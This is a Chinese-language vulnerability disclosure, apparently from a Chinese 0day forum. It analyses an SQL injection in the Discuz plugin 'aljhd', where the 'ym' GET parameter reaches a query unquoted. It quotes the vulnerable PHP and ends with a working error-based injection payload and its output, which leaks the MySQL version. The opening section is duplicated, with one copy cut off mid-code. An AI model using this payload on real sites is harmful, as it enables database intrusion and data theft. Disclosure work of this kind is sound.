Discuz某插件sql注射漏洞

摘要

Author:Saline
Email:[email protected]
首发【漏洞时代】0day5.com文件source/plugin/aljhd/aljhd.inc.php122行附近
[php]
}else{
$ymlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym();
$typelist=C::t('#aljhd#alj_hd')->fetch_all_by_type();

$currpage=$_GET['page']?$_GET['page']:1;
$perpage=$config['page'];
$num=C::t('#aljhd#alj_hd')->count_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status']);
$start=($currpage-1)*$perpage;
$hdlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status'],$start,$perpage);
$paging = helper_page :: multi($num, $perpage, $currpage, 'plugin.php?id=aljhd&ym='.$_GET['ym'].'&type='.$_GET['type'].'&status='.$_GET['status'], 0, 11, false, false);

include template('aljhd:index');
}
[/php]
然后其中的fetch_all_by_ym fetch_all_by_type fetch_all_by_ym_type_status count_by_ym_type_status几个函数在
文件source/plugin/aljhd/table/table_alj_hd.php中找到了
[php]
class table_alj_hd extends discuz_table
{
public function __construct() {

Author:Saline
Email:[email protected]
首发【漏洞时代】0day5.com

文件source/plugin/aljhd/aljhd.inc.php122行附近
[php]
}else{
$ymlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym();
$typelist=C::t('#aljhd#alj_hd')->fetch_all_by_type();

$currpage=$_GET['page']?$_GET['page']:1;
$perpage=$config['page'];
$num=C::t('#aljhd#alj_hd')->count_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status']);
$start=($currpage-1)*$perpage;
$hdlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status'],$start,$perpage);
$paging = helper_page :: multi($num, $perpage, $currpage, 'plugin.php?id=aljhd&ym='.$_GET['ym'].'&type='.$_GET['type'].'&status='.$_GET['status'], 0, 11, false, false);

include template('aljhd:index');
}
[/php]
然后其中的fetch_all_by_ym fetch_all_by_type fetch_all_by_ym_type_status count_by_ym_type_status几个函数在
文件source/plugin/aljhd/table/table_alj_hd.php中找到了
[php]
class table_alj_hd extends discuz_table
{
public function __construct() {

$this->_table = 'alj_hd';
$this->_pk = 'id';

parent::__construct();
}
public function count_by_ym_type_status($ym,$type,$status){
$where=' where 1';
if($ym){
$where.=' and ym='.addslashes($ym); //对$ym进行了addslashes转换
}
.......
return DB::result_first('select count(*) from %t '.$where,array($this->_table));
}
public function fetch_all_by_ym_type_status($ym,$type,$status,$start,$perpage){
$where=' where 1';
if($ym){
$where.=" and ym='".addslashes($ym)."'";//对$ym进行了addslashes转换
}

$where.=' order by endtime desc';
if($perpage){
$where.=" limit $start,$perpage";
}
//拼接出来的语句就是 select count(*) from alj_hd where 1 and ym='.addslashes($ym) and type='.intval($type) and starttime<='.TIMESTAMP.' and endtime>='.TIMESTAMP;
return DB::fetch_all('select * from %t '.$where,array($this->_table));
}
public function fetch_all_by_ym(){
return DB::fetch_all('select ym,count(*) num from %t group by ym order by ym desc',array($this->_table));
}
public function fetch_all_by_type(){
return DB::fetch_all('select type,count(*) num from %t group by type',array($this->_table));
}
}[/php]

发现对其中的ym仅仅是做了addslashes处理，我们知道的addslashes编码仅仅是在gbk下才有作用，所有整个显得鸡肋

[php]

select count(*) from alj_hd where 1 and ym=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and type=1

result:

(1062) Duplicate entry '5.5.29-log1' for key 'group_key'
[/php]